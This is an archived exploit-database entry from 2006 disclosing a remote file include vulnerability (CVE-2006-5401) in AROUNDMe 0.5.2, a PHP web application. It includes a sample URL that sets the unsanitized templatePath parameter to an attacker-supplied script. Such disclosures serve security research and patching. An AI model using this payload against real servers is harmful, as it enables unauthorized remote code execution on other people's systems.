AROUNDMe <= 0.5.2 templatePath Remote File Include Vulnerability

2006-10-15T00:00:00
ID EDB-ID:2562
Type exploitdb
Reporter Kw3[R]Ln
Modified 2006-10-15T00:00:00

Description

AROUNDMe <= 0.5.2 (templatePath) Remote File Include Vulnerability. CVE-2006-5401. Webapps exploit for php platform

                                        
                                            ---------------------------------------------------------------------------
AROUNDMe &lt;= 0.5.2 [templatePath] Remote File Include Vulnerability
---------------------------------------------------------------------------


Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :
Remote : Yes
Critical Level : Dangerous
---------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : AROUNDMe
version : 0.5.2
Download: http://savannah.gnu.org/download/aroundme/aroundme_0_5_2.tar.tgz
------------------------------------------------------------------


Exploit:
~~~~~~~~
Variable $templatePath not sanitized.When register_globals=on an attacker ca
n exploit this vulnerability with a simple php injection script.

# http://www.site.com/[path]/template/barnraiser_01/p_new_password.tpl.php?templatePath=[Evil_Script]
---------------------------------------------------------------------------

Shoutz:
~~~~~~~

# Greetz to [Oo], str0ke, th0r, RST TEAM: [ !_30, darkking, DarkWizzard, Elias, Icarius, MiniDisc, Nemessis, Shocker, SpiridusuCaddy and sysghost !]
# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]
---------------------------------------------------------------------------

*/

Contact:
~~~~

Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://RST-CREW.NET
__/*

# milw0rm.com [2006-10-15]